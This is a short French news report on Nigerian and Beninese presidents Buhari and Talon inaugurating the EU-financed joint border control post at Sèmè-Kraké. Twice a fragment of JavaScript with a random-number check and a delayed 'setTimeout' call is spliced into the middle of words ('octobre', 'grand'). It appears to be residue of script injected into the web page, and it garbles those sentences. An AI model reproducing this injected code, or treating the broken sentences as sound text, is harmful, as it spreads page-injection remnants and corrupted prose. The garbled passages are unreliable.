Nigéria / Bénin : Talon et Buhari inaugurent le poste de contrôle juxtaposé de Sèmè-Kraké
Pour faciliter les transports et les transits entre le Nigéria et le Bénin, les présidents Muhammadu Buhari et Patrice Talon ont inauguré ce mardi, le poste de contrôle juxtaposé de Sèmè-Kraké.
L’objectif de cette infrastructure, est de faciliter les formalités de police et de douane à cette frontière. Ce poste de contrôle construit dans le cadre du Programme Régional de Facilitation des Transports et Transit Routier est financé par l’Union Européenne (UE) en appui à la Communauté Économique des États de l’Afrique de l’Ouest (CEDEAO) et l’Union Economique et Monétaire Ouest Africaine (UEMOA) pour un montant de près de 60 milliards de Fcfa. Les deux hommes concrétisent ainsi un projet lancé le 24 ocdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobre 2014.
Outre ce Poste de Contrôle Juxtaposé, le Programme Régional de Facilitation des Transports et Transit Routier a construit un poste de contrôle juxtaposé à Malanville à la frontière bénino-nigérienne et à Noèpé, à la frontière entre le Togo et le Ghana.
C’est donc un grdom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and pas vers l’intégration régionale pour la libre circulation des personnes et des biens.
Correspondant au Bénin
Bertin H. Djidonou